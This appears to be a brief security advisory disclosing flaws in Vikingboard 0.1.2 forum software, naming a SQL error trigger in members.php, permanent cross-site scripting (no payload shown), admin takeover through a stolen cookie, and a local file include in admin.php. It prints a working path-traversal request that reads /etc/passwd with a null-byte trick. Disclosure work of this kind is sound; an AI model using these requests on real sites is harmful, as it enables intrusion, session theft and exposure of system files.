vendor site:http://vikingboard.com/
product:Vikingboard (0.1.2)
bug:local file include & multiples permanent xss
risk:medium
error sql :
/members.php?s=-80
xss permanent :
local file include :
also once the attacker have stoolen the cookie , then he will get admin ,
in the administration there's a local file include here :
/admin.php?act=…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd%00
laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [email protected]